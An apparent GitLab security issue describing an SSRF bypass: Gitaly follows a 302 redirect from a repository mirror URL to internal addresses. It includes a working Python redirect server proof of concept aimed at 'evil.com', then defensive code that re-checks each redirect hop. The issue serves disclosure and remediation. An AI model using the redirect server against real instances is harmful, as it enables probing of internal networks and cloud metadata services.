SSRF via repository mirror URL -- 302 Redirect
Opening a new issue here as suggested in #215879 (comment 381058501): the fix for #215879 (closed) would not address the 302 redirect bypass in this case.
H1 report: https://hackerone.com/reports/904288
Summary
Gitaly follows HTTP redirects when running the git-receive-pack command. This issue allows a malicious authenticated user to send GET HTTP requests to arbitrary hosts, including localhost, cloud metadata services and the local network, without reading the HTTP response.
Steps to reproduce
- Run redirect server on evil.com:

```python
#!/usr/bin/env python
# Python 2 redirect server from the report: answers the receive-pack request
# with a 302 to an internal address and everything else with 200.
import SimpleHTTPServer
import SocketServer


class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        if 'receive' in self.path:
            self.send_response(302)
            self.send_header('Location', 'http://0:1234')
        else:
            self.send_response(200)
        self.end_headers()


def main():
    handler = SocketServer.TCPServer(("0.0.0.0", 80), RedirectHandler)
    handler.serve_forever()


if __name__ == "__main__":
    main()
```
- Create a new project
- Add a commit to the repository
- Go to Settings > Repository > Mirroring repositories
- Add mirroring repository with URL: http://evil.com
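The bypass works because the mirror URL is validated once, at submission time, while the address the server actually connects to is chosen later by the redirect target. The following is an added example, not GitLab or Gitaly code, showing the defender-side fix: resolve and validate every hop of a redirect chain before connecting, reject anything that is not a public address, and canonicalize numeric shorthand hosts such as `0` or `127.1` with `inet_aton` so they are judged the way `connect()` will interpret them (plain `ipaddress` parsing rejects those forms and would let them through an `except ValueError` path). The `fetch`/`resolver` callables, the `mirror.example`/`attacker.example` names and the `11.22.33.x` addresses are constructed for the demonstration; `fake_fetch` replays the report's chain (a 302 to `http://0:1234` on the receive-pack request).

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

MAX_REDIRECTS = 5
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def canonical_ip(host):
    """Return an ip_address if `host` is numeric, else None.

    ipaddress rejects shorthand such as "0", "127.1" or "2130706433", but the
    OS connect() accepts them (the report's redirect target is http://0:1234),
    so fall back to inet_aton, which applies the same parsing rules as connect().
    """
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None  # not numeric: needs DNS resolution


def is_disallowed(ip):
    """True for any address a mirror must never reach: unspecified (0.0.0.0),
    loopback, RFC 1918 / other non-global ranges, link-local (which covers the
    169.254.169.254 metadata endpoint), multicast and reserved space, including
    IPv4-mapped IPv6 spellings of those addresses."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_unspecified or ip.is_loopback or ip.is_private
            or ip.is_link_local or ip.is_multicast or ip.is_reserved
            or not ip.is_global)


def system_resolver(host):
    """Resolve with the OS resolver; replaceable so the check runs offline."""
    return [info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)]


def check_url(url, resolver=system_resolver):
    """Validate one URL: scheme, host present, every resolved address public."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parsed.scheme
    host = parsed.hostname
    if not host:
        return False, "missing host"
    ip = canonical_ip(host)
    addrs = [ip] if ip is not None else [ipaddress.ip_address(a) for a in resolver(host)]
    for addr in addrs:
        if is_disallowed(addr):
            return False, "%s -> %s is not a public address" % (host, addr)
    return True, "ok"


def fetch_with_checked_redirects(url, fetch, resolver=system_resolver, max_redirects=MAX_REDIRECTS):
    """Follow redirects by hand, re-validating the target of every hop.

    `fetch(url)` performs one request with automatic redirects disabled and
    returns (status, headers, body). Returns (response, reason); response is
    None when a hop was blocked or the chain is too long.
    """
    for hop in range(max_redirects + 1):
        ok, reason = check_url(url, resolver)
        if not ok:
            return None, "blocked at hop %d (%s): %s" % (hop, url, reason)
        status, headers, body = fetch(url)
        if status not in REDIRECT_STATUSES:
            return (status, headers, body), "ok"
        location = headers.get("Location")
        if not location:
            return None, "redirect without Location at hop %d" % hop
        url = urljoin(url, location)  # relative Location headers are resolved too
    return None, "more than %d redirects" % max_redirects


# Constructed sample environment (hypothetical hosts, not real ones): a DNS
# table and a fetcher that replays the report's chain, where the attacker's
# host answers the receive-pack request with a 302 to http://0:1234.
FAKE_DNS = {"mirror.example": ["11.22.33.44"], "attacker.example": ["11.22.33.55"]}


def fake_resolver(host):
    return FAKE_DNS[host]


def fake_fetch(url):
    if "attacker.example" in url and "receive" in url:
        return 302, {"Location": "http://0:1234"}, b""
    return 200, {"Content-Type": "application/x-git-receive-pack-result"}, b"0000"


if __name__ == "__main__":
    for u in ("http://attacker.example/repo.git/git-receive-pack",
              "http://mirror.example/repo.git/git-receive-pack"):
        print(u, "->", fetch_with_checked_redirects(u, fake_fetch, fake_resolver)[1])
```

One caveat the example does not close: `check_url` resolves a hostname and then the HTTP client resolves it again when connecting, so a DNS answer that changes between the two lookups (rebinding) can still slip through. A production fix either connects to the exact address that was validated (pinning it in the transport layer) or disables redirects for mirror operations altogether and has the mirror submitter fix the URL.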